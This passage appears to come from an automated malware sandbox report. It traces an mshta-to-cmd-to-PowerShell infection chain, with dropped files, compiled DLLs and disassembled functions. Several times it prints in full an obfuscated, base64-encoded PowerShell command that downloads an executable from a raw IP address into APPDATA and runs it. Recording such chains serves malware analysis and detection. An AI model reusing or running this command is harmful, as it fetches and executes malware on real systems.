tRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AB4B37 LoadLibraryA,GetProcAddress,

6_2_00AB4B37

Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AD8945 push ecx; ret	6_2_00AD8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040D946 push ds; ret	7_2_0040D95D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004271D3 push esp; ret	7_2_00427239
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00417A65 push 1D9A8CFAh; ret	7_2_00417A6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004142E1 push ss; iretd	7_2_00414337
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004142BB pushfd ; retf	7_2_004142E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004034A0 push eax; ret	7_2_004034A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040856C push edi; iretd	7_2_00408586
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004145E2 push ecx; iretd	7_2_004145ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041AEAF push es; retf	7_2_0041AEB6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00417735 pushad ; iretd	7_2_00417736
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040D7A3 pushfd ; retf	7_2_0040D7A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B309AD push ecx; mov dword ptr [esp], ecx	7_2_03B309B6

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\winnit.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00AB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		6_2_00AB48D7
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B35376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		6_2_00B35376

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AD3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_00AD3187

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
